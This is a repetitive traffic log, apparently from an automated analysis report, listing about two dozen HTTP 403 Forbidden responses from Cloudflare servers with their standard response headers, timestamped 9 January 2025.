Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOqpIptW59X6ITCpzXI5WQm9kADr7BqhucA8FO5gOS4oPGIIru%2B2s3WQ85uJN4ml5zIm40WWXY9OPne6WpvIJnO3fDc%2BdfS1GlIZNGoe3TvhTB%2BVVhrQyDkTSYQCOCaOYs%2FKlnDjw%2Fi3ghkU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3b8181ede96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1612&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1767554&cwnd=224&unsent_bytes=0&cid=9a4e25e08fcdcfc1&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRP0As7uzMS26CPrcyrGeCHOsl9MAS7Xxuobh%2FdKIH740z4n%2F8obn12Ysj1OVUkN%2BSQ%2BilOGgYkOa%2FGe6kE4iG0JWlfc%2Btof0ajz4AD0yugzGS3r6IhSRrgxXC17vRjKFAlWUy1YnRj2apdN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3bbfaa317ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1689&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1676234&cwnd=172&unsent_bytes=0&cid=46f85af4b9578e60&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16gkhl50lEVTv8yYeE04ARvUNpqAMpYPq8xcadnA97ssgOGwJE5roWdX8RAq6Sweomi3%2Bhpt5GIHytpmBYkZBrXZA%2BOa0fWQ6atFC%2FLh2yLjGb9GBAqUIAD2DzY1kgFh7lYVRooZwrHDDNQ8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3bfbfe37271-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1962&rtt_var=751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1442687&cwnd=225&unsent_bytes=0&cid=21855a3336b1229a&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:09 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvtHPcEGgdW7CHXYVh4zEGdLgyJPQU4iX8aJZqNE3vwqAn1g7B2uWvu1Zi%2F2W%2BYzn1jBjQe27pngqklXjemTS1sSNwV0rOs%2BtEnS9lBdVv4nfhMDwSk0U25%2Bm0tD1nlyIArb3OWIfcy5%2FlZD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3c35de74244-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1744&rtt_var=663&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1638608&cwnd=221&unsent_bytes=0&cid=0fb03c21f5556ba7&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2B40JQ%2BKvj42kCDQfBNTe54H25Xuhfyg9ZTXMaIin98edOgFwx1eemWkli3FH5ZrZ0XU%2FYVk0ERDItNO1tz6sxI6P9v%2FROzxz4iYnF%2BB0zFhNj%2FdaU7866undk9GtZ4iwnaMGB%2B2y%2BuXIaA%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3c7380c42b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1737&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1658148&cwnd=233&unsent_bytes=0&cid=61f3ca0df805a4a8&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYzkFD5YQMEMdWi8jrFp%2FO6QdGXHq3v2BM17AFufG%2FJR3vVudusd8U2m%2B8HVUJhrptfso7uyFGQ2DC6AcHMiMB7lLFsjpHcf7t%2BZmnTVGCILh2GD%2ByVhHfkLTAzDVlz24qrz8CXks6GRbFHj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3cb2b33c32a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1460&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1899804&cwnd=242&unsent_bytes=0&cid=e69c46c5dae19b4e&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8DSP%2Bu34YfNXnAbue5h%2FFNHkzbGa9zm4aLTqagE9tCUiSo7YBmurLwF9cHasphZXBvT9DIOLxdTHfoxCKdMkQpnQw%2FYt9KzSLuOS8afKW5OGkTxPP5qqQn8L1lkdyb%2FWQ6OtMKuAjeDYgSwL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3cede04427c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2491&min_rtt=2491&rtt_var=935&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1169403&cwnd=246&unsent_bytes=0&cid=916a3e14b609a088&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0VA5l2yrkI4rds9QFgOzbJffFaF2xAisi5PiW5QTMVYg%2FaXpDc1P4RPqyggL2LJMR8NXDKyiSqRJzyxZAx6ESGFb5qyvrDvmSuQ556et8SVWYgbz140xGNbB6hJ57VfRmz1Y6P7%2BwJhefQ9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3d2af568c60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1949&rtt_var=764&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1401824&cwnd=67&unsent_bytes=0&cid=a5d23b3d2e1dbdbd&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOz%2FV%2FGR2tRvLfhA9CWUNCTQBbRjD4nYsjGoP9Y3t0blLPBQBhEHjdawseIT5aEITp0nEProBgp1YuXvs3jwdrqCNv2CVrtsyGjbqz6cY5HTHFcq8PUf5SG1iiX3nmt%2FflKmbUlaE4yi5cXE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3d65dd6435c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1747&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1624930&cwnd=249&unsent_bytes=0&cid=41cfe7db244b3be8&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkvnNBS96Q%2B8Z2jGKbgoPscUU8I2vuvgOwOmClYiIX2TTM4n%2FAtiQx8WmLSqodhuFmpHiFxqv0pOAumSUXBE1%2BnvZNXYezhxPZMjsM5HgAhG%2BoA9sDHBZgv%2FVqNjwAC%2B%2F7s2QIa29W7COnBj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3da1f48f793-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1701&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1716637&cwnd=152&unsent_bytes=0&cid=a212bef686ecc400&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ifYqD5QNo5ZD%2Bwbz83nk68eO1Vhttzd45HxzYIVh4hQqrq3i%2FscjhWGOD4fVJnoFUqGpps%2Fgu%2BaL20wJ4nGKsHKGTFuZvqG0T7pJXlXHiKNAHl3QIPbNtNHOXb3Ok5nrX6rYogsVCaA6vfCa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3ddedbe8c45-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1961&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1459270&cwnd=219&unsent_bytes=0&cid=7aa203b95c67f136&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zU%2FYx09lz3o6kIKXS0ZklFn9NY3x6WfK7QhpaxnCFKgoqZlhLOd%2FBQ50QM0RpZUAvbLw3mX2EPVsLxmq5ynCz4FK0wiqhqpQzYqa3tr7GfJJHvqDIim%2BUbGHCCQCcyiQbpY%2FZ4pT9p6tI8hd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3e83dd0c47c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1710&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1685912&cwnd=214&unsent_bytes=0&cid=2e23aaef6f8cd6cd&ts=1177&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htFnLbQpSdVFNwwGexLjIe%2BUW5AnfkTK4yqb4oh%2BV7QkFpgQeb04ZYsHPh%2Fu5%2FbQd0NErqcUlfvdpXiHyIj%2Fki9L%2F%2BYho6YQ8pDH9vAcCcOklPzqEDvgubaaG3raNL%2BKkRPAWAalfZSFjpkt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3ec1fa3c484-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1689&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1700640&cwnd=248&unsent_bytes=0&cid=985cb4de2c554bd4&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfvyhrizxzWgaagFeIbPjjkBA5vz2W9zSXDR5giY%2BZ2xUPu2wvu9AxFNTqtfCRH8xhrRbWoxeYYVup%2BgCi7WVPTCUOR02XJYFAvmho16oyrarcy5RXuqFI8KUjgTOjCOhRZ85aqmmrnVvv5q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3effd4f0ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1470&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1904761&cwnd=32&unsent_bytes=0&cid=07bbe43fbc6d56c8&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt9blhD8jlsm3IYFCE4PfO4FyA%2B2MyypY0uCBUxABVYtcQXsIinZcRaVHVgiVgzxmxjBMcurUZkAY%2BJv1VodzmsE0oOlavTdbE%2Bv%2F7S1X9m8cKG3y0OPscNk%2BJkZ3CE%2BYWEP%2BXF%2BCb29UO44"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3f3be95236a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2008&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1427872&cwnd=170&unsent_bytes=0&cid=f90c818836391d2e&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BN16ZBzBmNe9Cjq9MKz8%2FNWdbGQj2D25sZBNbP0su0zFNMxOxghSfZgUyzviRSGmcg6WiYF2Txu12az8ItQlgzxUSqLs4J%2FHLqujCuvOKPLNvwXnYrH7AM8ldXTwuVsPbgCIqnnS7f61aLJN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3f79ef342aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1879&rtt_var=706&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1549893&cwnd=201&unsent_bytes=0&cid=57859b6bc913b69c&ts=144&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQ4yO1%2FSUmdy4rbnLdbPa6x74OwnJDA0nxloPDfd55lNRFwyoIqXEyKfFMmLSHzxx%2B%2FyRDjYTf0lwLX0MCbKberCkmFD%2B01CoZv17t564TQJbnak3hH%2BPt7Dgr%2B1Ea21PJR39VILsII1dJY2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3fb6f29c448-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1604&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1767554&cwnd=230&unsent_bytes=0&cid=1f244eda7af018cb&ts=144&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9JYvlYoh0taYB0p%2F2JI9eosOj0%2FbcLkBP8hQ1GzRKoQVoDqrpAEvyip%2BYQ7NE3MR5J7Rv9mrDhO5dDoBSnpKDx7ax2R98bFaogghwqOMW71FX7PSZYYEbT7lyp%2BSxQek7Pqk3uirHLkWzyA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3ff6dfa7ced-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1985&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=704&delivery_rate=1410628&cwnd=179&unsent_bytes=0&cid=8e533fcb9c297a63&ts=165&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAIeYd0TPxFDPxtI%2BMDJ9CI3XM7jqw%2FMibk3hiqDFNA5CyafV%2B4oCONx3Jz6ubWvL37uQ3VcnDcHcFmjjgqzlQgavxHtcbjuPliTBEIp%2BCktj2KlR%2ByEN4RB2%2FwO0skYbAgxKtC2KtZE9LFP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c403283b41f5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1635&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1762220&cwnd=211&unsent_bytes=0&cid=1b78ca58f80fd29f&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKn3pV%2FhVPse9VcDpz1vbo7LazvVnvdJxP8r4r6yA%2BMfEcHzn6MkuSbtfwwnikOfKI2Uiom5cHCzckqPD8fgVdJpYU2Euh6ySo%2BfzeFdAGu6n9CtFGCu0QT%2F%2FPuskeFgy7JPRf9xPkPGHyQ3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c406ed774344-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1623&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1775075&cwnd=47&unsent_bytes=0&cid=46016892a7539445&ts=132&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4KimjD9P%2BJAdafjaYcv%2BMEpZ4RQZt%2Bo5y0Q9nxXUWvuqCWLEiTUPDa9Mcts4NEnFAHlM%2FBXPp6NvA%2Bk7yDLttvUs%2Bn3HpYqjnDFn4E7AryD22zhZHxrQho%2F92%2Ba%2FljpxlySIVEeDPIb7DrH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c40aed7b41cd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1662&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1748502&cwnd=227&unsent_bytes=0&cid=70c1c6c64c322591&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=djtR6S0lMUz%2BA%2B3Ifp7oHVNU2Zt1CMCQZjAg7sIPT7ys%2BXUKUAPkTzFUseAf6KeBsMUSxMHmC9AMwvOpLZEMKXx1v2s%2BLOumP51RGfpmVikfaDQrlDJvhuljrDOZwBIum1TKDCbef%2BcKAomj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c40ebb0741fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2230&min_rtt=2228&rtt_var=840&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1300089&cwnd=231&unsent_bytes=0&cid=8d81770df477602e&ts=142&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZdFMjCTrnT3f2PD0GuebwCZd3k49n1BBHyT4ht3mjquoUHtm6aYcev9Rx6LR3TE6ttvGBFTYb6BAfdNFXlg%2BGEmNXpYEF3fkF6zWwwWSVEufMTcLpR%2BIEN61043gCHeVLd%2Ffl2NvzbR2NUFk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4126ad50f7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1607&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1783750&cwnd=231&unsent_bytes=0&cid=4ef1ef83895a7c83&ts=139&x=0"
